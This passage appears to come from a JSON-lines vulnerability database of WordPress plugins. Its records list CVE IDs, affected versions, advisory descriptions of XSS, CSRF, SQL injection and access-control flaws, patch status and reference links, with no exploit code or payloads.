possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53eba5b4-7cc0-48e1-bb9c-6ed3207151ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53eba5b4-7cc0-48e1-bb9c-6ed3207151ab?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-simple-press-wordpress-forum-arbitrary-file-upload-6-6-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-simple-press-wordpress-forum-arbitrary-file-upload-6-6-0\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-simplepress-plugin-fixed-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-simplepress-plugin-fixed-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27d4a8a5-9d81-4b42-92be-3f7d1ef22843\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27d4a8a5-9d81-4b42-92be-3f7d1ef22843\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3752","slug":"crelly-slider","versionImpact":"1.4.5","description":"The Crelly Slider WordPress plugin through 1.4.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e738540a-2006-4b92-8db1-2476374d35bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e738540a-2006-4b92-8db1-2476374d35bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5418","slug":"dethemekit-for-elementor","versionImpact":"2.1.4","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slitems' attribute within the plugin's De Product Tab & Slide widget in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bdbde1-1414-4113-890e-b6c96b8a6e11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bdbde1-1414-4113-890e-b6c96b8a6e11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.4\\\/widgets\\\/de-product-tab-slide.php#L1617\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.4\\\/widgets\\\/de-product-tab-slide.php#L1617\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.0\\\/widgets\\\/de-product-tab-slide.php#L1619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/tags\\\/2.1.0\\\/widgets\\\/de-product-tab-slide.php#L1619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dethemekit-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dethemekit-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094885\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094885\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11440","slug":"grey-owl-lightbox","versionImpact":"1.6.1","description":"The Grey Owl Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gol_button' shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grey-owl-lightbox\\\/trunk\\\/functions\\\/functions.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grey-owl-lightbox\\\/trunk\\\/functions\\\/functions.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grey-owl-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/grey-owl-lightbox\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faf45a8d-1017-476e-8af9-2fbe250e8e19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faf45a8d-1017-476e-8af9-2fbe250e8e19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12027","slug":"cf7-message-filter","versionImpact":"1.6.3","description":"The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the updateFilter() and deleteFilter() functions in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update and delete filters.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12469","slug":"wp-base-booking-of-appointments-services-and-events","versionImpact":"4.9.1","description":"The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018status\u2019 parameter in all versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207855\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207855\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-base-booking-of-appointments-services-and-events\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-base-booking-of-appointments-services-and-events\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6613ad-1fb2-4278-adc1-fe5d1ade3ad5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6613ad-1fb2-4278-adc1-fe5d1ade3ad5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12439","slug":"marketplace-items","versionImpact":"1.5.5","description":"The Marketplace Items plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'marketplace' shortcode in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602ae805-a6a6-48bd-bd2a-00fafadfdce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602ae805-a6a6-48bd-bd2a-00fafadfdce4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0350","slug":"wow-carousel-for-divi-lite","versionImpact":"2.0.4","description":"The Divi Carousel Maker \u2013 Image, Logo, Testimonial, Post Carousel & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Carousel and Logo Carousel in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L327\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-carousel-for-divi-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-carousel-for-divi-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e57a85b-3ea8-46df-ab60-ce835268b1f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e57a85b-3ea8-46df-ab60-ce835268b1f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13543","slug":"zarinpal-paid-downloads","versionImpact":"2.3","description":"The Zarinpal Paid Download WordPress plugin through 2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04a545c4-75d3-4672-8530-00bb879991ca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04a545c4-75d3-4672-8530-00bb879991ca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1488","slug":"wpo365-msgraphmailer","versionImpact":"3.2","description":"The WPO365 | MICROSOFT 365 GRAPH MAILER plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 3.2. This is due to insufficient validation on the redirect url supplied via the 'redirect_to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if 1. they can successfully trick them into performing an action and 2. the plugin is activated but not configured.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244747\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244747\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpo365-msgraphmailer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpo365-msgraphmailer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a1782c3-ae0b-42f1-aa5e-dabfa2a5bbcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a1782c3-ae0b-42f1-aa5e-dabfa2a5bbcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpo365.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/www.wpo365.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13413","slug":"productdyno","versionImpact":"1.0.24","description":"The ProductDyno plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018res\u2019 parameter in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This vulnerability is potentially a duplicate of CVE-2025-22320.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/productdyno\\\/trunk\\\/admin\\\/partials\\\/productdyno-admin-display.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/productdyno\\\/trunk\\\/admin\\\/partials\\\/productdyno-admin-display.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251678\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251678\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/productdyno\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/productdyno\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc1289a-abd1-43db-89b7-3e81878a0f9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc1289a-abd1-43db-89b7-3e81878a0f9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4131","slug":"gmapsmania","versionImpact":"1.1","description":"The GmapsMania plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's gmap shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmapsmania\\\/trunk\\\/gmapsmania.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmapsmania\\\/trunk\\\/gmapsmania.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30d39718-945a-43a2-be08-70be1af55965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30d39718-945a-43a2-be08-70be1af55965?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11372","slug":"logs-de-connexion","versionImpact":"3.0.2","description":"The Connexion Logs WordPress plugin through 3.0.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de74199a-001e-4388-82ae-70cfd5a49457\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de74199a-001e-4388-82ae-70cfd5a49457\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7440","slug":"anber-elementor-addon","versionImpact":"1.0.1","description":"The Anber Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the $item['button_link']['url'] parameter in all versions up to, and including, 1.0.1 to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67b0f756-9130-402d-9787-78d482fa183e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67b0f756-9130-402d-9787-78d482fa183e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4795","slug":"wc-gallery","versionImpact":"1.67","description":"The Galleries by Angie Makes WordPress plugin through 1.67 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5052e60f-59ea-4758-8af3-112285a18639\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5052e60f-59ea-4758-8af3-112285a18639\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0424","slug":" ms-reviews","versionImpact":"1.5","description":"The MS-Reviews WordPress plugin through 1.5 does not sanitise and escape reviews, which could allow users any authenticated users, such as Subscribers to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0f8713f-54b2-4ab2-a475-60a1692a50e9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0f8713f-54b2-4ab2-a475-60a1692a50e9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3764","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.90","description":"The WooCommerce PDF Invoice Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.90. This is due to missing or incorrect nonce validation on the Save function. This makes it possible for unauthenticated attackers to make changes to invoices via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf2e701-9f9b-4a78-a61a-0cf90cdd9755?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf2e701-9f9b-4a78-a61a-0cf90cdd9755?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951617\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?old=2949518&old_path=woo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951617\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?old=2949518&old_path=woo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L894\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L894\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48322","slug":"edoc-employee-application","versionImpact":"1.13","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eDoc Intelligence eDoc Employee Job Application \u2013 Best WordPress Job Manager for Employees allows Reflected XSS.This issue affects eDoc Employee Job Application \u2013 Best WordPress Job Manager for Employees: from n\/a through 1.13.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/edoc-employee-application\\\/wordpress-edoc-employee-job-application-plugin-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/edoc-employee-application\\\/wordpress-edoc-employee-job-application-plugin-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9895","slug":"clover-online-orders","versionImpact":"1.5.7","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's moo_receipt_link shortcode in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7263e89-94b2-42e6-a7ed-a86579ce649e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7263e89-94b2-42e6-a7ed-a86579ce649e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clover-online-orders\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clover-online-orders\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/shortcodes\\\/checkoutPage.php#L2011\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/shortcodes\\\/checkoutPage.php#L2011\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168433\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168433\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12003","slug":"wp-system","versionImpact":"1.1.1","description":"The WP System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the generate_wp_system_page_content() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-system\\\/trunk\\\/wp-system.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-system\\\/trunk\\\/wp-system.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12127","slug":"sikshya","versionImpact":"0.0.21","description":"The Learning Management System, eLearning, Course Builder, WordPress LMS Plugin \u2013 Sikshya LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 0.0.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207940\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207940\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sikshya\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sikshya\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0170668-65bc-4d65-a88b-9398391c98d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0170668-65bc-4d65-a88b-9398391c98d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12438","slug":"woocommerce-digital-content-delivery-with-drm-flickrocket","versionImpact":"4.74","description":"The WooCommerce Digital Content Delivery (incl. DRM) \u2013 FlickRocket plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'start_date\u2019 and 'end_date' parameters in all versions up to, and including, 4.74 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L613\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L613\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L614\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L629\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L629\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L632\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L632\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocom